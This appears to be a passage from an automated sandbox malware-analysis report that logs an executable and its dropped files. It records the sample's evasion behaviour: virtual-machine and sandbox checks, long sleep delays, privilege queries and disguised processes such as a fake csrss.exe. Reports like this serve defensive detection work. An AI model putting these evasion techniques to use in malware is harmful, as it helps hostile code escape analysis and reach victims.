                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Checks if the current machine is a virtual machine (disk enumeration)
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\egiibgtKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\egiibgtKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\egiibgtKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\egiibgtKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\egiibgtKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Roaming\egiibgtKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\AD52.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\AD52.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\AD52.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\AD52.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\AD52.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\AD52.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Tries to detect sandboxes / dynamic malware analysis system (file name check)
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: \KnownDlls32\tESTAPp.ExEJump to behavior
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: egiibgt, 00000006.00000002.1659097069.000000000079E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKI*KK
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeMemory allocated: 17A0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeMemory allocated: 32D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeMemory allocated: 3110000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeMemory allocated: 6360000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeMemory allocated: 5810000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 422Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1806Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 949Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 360Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 611Jump to behavior
                      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 630Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeWindow / User API: threadDelayed 6061Jump to behavior
                      Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exeWindow / User API: threadDelayed 5868
                      Source: C:\ProgramData\Drivers\csrss.exeWindow / User API: threadDelayed 7633
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2297
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 823
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6653.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-I193V.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-9633C.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\libgcc_s_dw2-1.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\zlib1.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\avcodec-58.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\libvorbis-0.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-72Q7F.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-AQUGE.tmp\_isetup\_shfoldr.dllJump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\EE8C.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\avformat-58.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-P1HCF.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-PUUKO.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-CABAS.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsvA60A.tmp\INetC.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\libbz2-1.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\libiconv-2.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-5C03R.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\libvorbisenc-2.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-7FTBB.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-E4NNM.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\SDL2.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MHXXL5K6\syncUpd[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsxAC73.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\avutil-56.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\libwinpthread-1.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-AQUGE.tmp\_isetup\_iscrypt.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-M6VRO.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-5HMK4.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\unins000.exe (copy)Jump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\C338.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-2VNVT.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-BNUL3.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-SB997.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\libogg-0.dll (copy)Jump to dropped file
                      Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4312.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\swresample-3.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-AQUGE.tmp\_isetup\_setup64.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-AQUGE.tmp\_isetup\_isdecmp.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Any Burn Free\is-2MD1R.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\78A4.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_16-5691
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_10-4426
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpAPI coverage: 7.7 %
                      Source: C:\Windows\explorer.exe TID: 7976Thread sleep time: -180600s >= -30000sJump to behavior
                      Source: C:\Windows\explorer.exe TID: 7972Thread sleep time: -94900s >= -30000sJump to behavior
                      Source: C:\Windows\explorer.exe TID: 5780Thread sleep time: -36000s >= -30000sJump to behavior
                      Source: C:\Windows\explorer.exe TID: 6360Thread sleep time: -31400s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exe TID: 7552Thread sleep count: 6061 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exe TID: 7552Thread sleep time: -606100s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6056.exe TID: 7668Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6374.exe TID: 3652Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 7072Thread sleep count: 81 > 30
                      Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe TID: 2360Thread sleep count: 5868 > 30
                      Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe TID: 2360Thread sleep time: -11736000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe TID: 6312Thread sleep count: 73 > 30
                      Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe TID: 6312Thread sleep time: -4380000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe TID: 6312Thread sleep time: -60000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\914D.exe TID: 3348Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 6384Thread sleep time: -30000s >= -30000s
                      Source: C:\ProgramData\Drivers\csrss.exe TID: 2272Thread sleep count: 7633 > 30
                      Source: C:\ProgramData\Drivers\csrss.exe TID: 2272Thread sleep time: -763300s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960Thread sleep count: 2297 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5096Thread sleep count: 823 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1544Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1268Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeFile opened: PHYSICALDRIVE0Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exeLast function: Thread delayed
                      Source: C:\ProgramData\Drivers\csrss.exeLast function: Thread delayed
                      Source: C:\ProgramData\Drivers\csrss.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_00462578 FindFirstFileA,FindNextFileA,FindClose,18_2_00462578
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_00452A34 FindFirstFileA,GetLastError,18_2_00452A34
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_00474D70 FindFirstFileA,FindNextFileA,FindClose,18_2_00474D70
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_004975B0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,18_2_004975B0
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_00463B04 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,18_2_00463B04
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_00463F80 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,18_2_00463F80
                      Source: C:\Users\user\AppData\Local\Temp\78A4.exeCode function: 16_2_00409B30 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,16_2_00409B30
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exeThread delayed: delay time: 60000
                      Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exeThread delayed: delay time: 60000
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: explorer.exe, 00000002.00000000.1415007841.0000000008C9E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00dRom0
                      Source: explorer.exe, 00000002.00000000.1415007841.0000000008B09000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&0000004
                      Source: explorer.exe, 00000002.00000000.1415007841.00000000089EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1415007841.0000000008BB8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: 5A89.exe, 00000008.00000003.2930706935.00000000037F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m egx8MSEl4LP58Dm9OGfPs/rNBGgUtlXG+jDHF8JHgFs
                      Source: 5A89.exe, 00000008.00000003.3039427133.00000000038E7000.00000004.00000020.00020000.00000000.sdmp, 5A89.exe, 00000008.00000003.3030931859.00000000038E7000.00000004.00000020.00020000.00000000.sdmp, 5A89.exe, 00000008.00000003.2991826783.00000000038E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: M_JL5vq8OT/r5zKqY6BnOih8n6RHV3ZfJwJfjM-egx8MSEl4LP58Dm9OGfPs/rNBGgUtlXG+jDHF8JHgFs-eg+LEmXl8ieWU+336DqP/G0/8aJ4zS7lkTqqfuwJ7og-eh/165pCOo9Rhqna/NPgoXgzqj1FPwZFmVPBdWaJg+w-eiIMxS+q4kA6Oszx1FETHeYsU3hJ/nAGraIv1XaU93U-eiheONssC27rafOVP++3DRnD3+wmX9BkYaLyoIqplDQ-ei6v5MMmuEx0YBS+/J+jG6V+KKsPjGmn+X5x+fQfzdU-ei9NmNSqE18cJ4zpx/8UwnnWMmvdqxAzfTVXNB/oXJs-ejJvlKMDa64hrz37oWYT/gY9Q06vQWbcI9GVWPmlwhQ-ejLh9VI0ksR79ltiChqc6n/oNUkV1+RDRs+jr4gMku0-ekNbNuxpg4pAhaL2iol5RigFAMzRMm27+lXwLSZ8fS0-ekfJ8qAfi0FYR4Jy7SIQBTqFizuOVgzpLIIDwaPPbiU-ekjdD17WnDCjU9PDpOl5lcDG0BwAhYsIbXGrIdCnOz0-elNHbGyW92ZstgLGATu0mHA3SSbISDtdtkpFtRhjxEQ-emraI0H5XJqmiAQ6lD4p4rTufnIAsfMSLazx7QuoTyg-ensT1UE3wz/HlezwbWGtMWa9OZf6aBzrndB8LoZ4cVA-eoIxWUkdpDh34fE24Fv65/tHKVLCzfag642xN8IllOU-eoOGhT9aVFRI247Ejw83FZf7GX2NsALrHN3pfR8Zba8-eoYhAd1Izs8/Mq/KRJst1hqNRbhdig4Hfh4Xiop8vxo-eo5PoeVaxkx97uTuBempEP7+uCHa4EoTsiI11dzK6lE-epTTn/6KHUYLECHzT4y7FA2juD9oLGYeacjUB35OU6g-epTxdIKr3fCTYCUyTXPQR/U5AzjKQohjifv4QFESylw-eqFnMHheHumUaOZ5/tJTZb0+DDfOC5/rd0pDKNQHd58-eqvZCbB1ZTcQyXOSBfCjTy7E2MYz2xAjVNLO/dGK+os-erBWDQZczqfm0HxNYvnPQtH3LwKVs0F+oP1G9qJ1jrE-erovMFWX+/u4JsrSpcXJb+Q0DdmqJpHmOdusN5GnY7A-eru21/QrtGoXe16ofT2RDGg1mQ+vYl6J4T2fvMPc1Us-eru6dA/tRLLS/zjwULnVGn0QPbRK+dwYQa/vor9jQAc-eshBQCcBl8aWg1FXGs2G3qduoR0Sd18Phu2S3LeN93c-eswIJDJzP95T1os79KuG40FcM3fVkSNIbNKj4ON2Vo8-etaVDqjXcRAUPdZ0iq1RSrN91fMaWvXekWtW5WaPfpU-etsrVCOBbnFnW4xNBWulwyhMftp33UtPx4qogYffOPc-euLo8hQxOGnYXxBLwBCLYra25Xu+qUoFb0LRPkSpuT4-evDzh83iZQOGwhThpcGKEPSZmyP6frEKTMFZ9apc634-evLuTQzTLqFK7M5+SuQ5yl7t1q/w44Jf1ItEjtDmGyo-ev3nFqwnuo9IU5OFG44orT5hbzlCf7OWLn2wBnNC8tg-ewyI6Lej9rYYIBZ4idnQ+WstBe5Rm9Z8XMa0TR57r3o-ezUNfgjMc7FKnykM7ACEZfUqTlFu6Q11YurigiTxDeA-ezgda5H9moseim738Ag96i9WAZhZJmZ38+qNxa8k3B0-ez+oi00DYMB7+cVXh4fuork1b7Sy0QlgoJk6XgiU/AM-e0rdYYXwlP79lnKahz0VNAT0W4/55MTNlxRP3DOs9ug-e1gSpno6KmV6x2PZKS7qKrdDWq8DO3RS7TIEUcqixpI-e1tnHkrve/ex6423Gj3ifjmPJAeU19bbWwHE+i04XsE-e162F938bxWKKyCYK91G8byPqOqGTyji6LBQFDRT2zc-e22kuU/RfDacLE+l/KpyVGGEoHLZyLBIpjquN237lT0-e31u7SMky76ygmxEdWNk3HKxXIe1MBVjBqJqcWbMINw-e35/gDdiLRBRq31STbKcaMSKEnZ/LSNZPszXJiJMNqI-e4S8yi3qv3XuBn9t7ylX9JURiMC+r4VGcP0lO+AziXU-e4lVeMdc+CDfWP9aiVzXesicc9cJh93y1hTHHgvoJE8-e41BLZM1I3EgKaVT/OsuJERvNynwmTSfueq9IFb7jpQ-e5fo3c8VekzioPQKgD7vmnPUnDw4mwb3nAIvtv57sac-e5vDZKUWW2rugfRJEbCQx/zHAnfHAHsTqOw7NyrETwk-e6xM+zKnDwa/LtcntndALfB059oFwmv14L6gHnz/WRo-e6xjm5GgYDUS12PmlN8nzBMqpJzVvXMSZEQ3vlZ/2SU-e7QmqCiQghaccS0dAmUTIi7xqHpkFpGm+r1Y0bAKvHo-e7zIKEIU6THMGFZUWnZ3GzgZqvJDpi+qlHo2iiHcmgM-e8KgVMp1MLu5JYLOOlmJPLPnFlPb+xHm4BxVyMRx3g0-e81DiL1CfSZFrsb5ttv9jvDnwdhfC2h7qQqbLw9oqso-e8/UpPXnvMMFV4i3u/DtDiVwoiltkL3/bhApG80zHig-e+ahS69dNNL+OMZfTrOWOlYSPk75s7J4odyOxicarbs-e+ko3ra6wpp9qkplg8J5GNxRF4UtxiIB0EDm5g5tXy0-e/tvZBkYAJGf2lnFlbtJjq1OiDc9TxvWO4yBUJD3PIM-fA0brBRDWMycEsC36RU43T3w7qpfpjdSgnAH45IOJ8A-fBDwqJaaE06Q7A6gzdDGAGW3tUVxUkpXR4/iEwNpvnM-fB7eo59mpkT8dehLT7HG92tXS0OdubBbleYOsDN8QBA-fB8V5fgDuQOuiv0x0G7Xe35ShykDwJJezOY0lrUF0Mc-fCXABMNA2yf0nn7G4lQMHhJ+du1vXSPCzh/I2Ku3F3o-fCj9FbMUOiNzz/Db1SiN3zEshPd7uea+y/x+0mk3oy4-fCs2tW0jeG7fq
                      Source: explorer.exe, 00000002.00000000.1415007841.0000000008B3F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                      Source: 5A89.exe, 00000008.00000003.3118587315.00000000030C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: id ed25519 5uD7nVmCI5DppHHtx2H+7AzbTP39/UvAQinqkc/a/lg
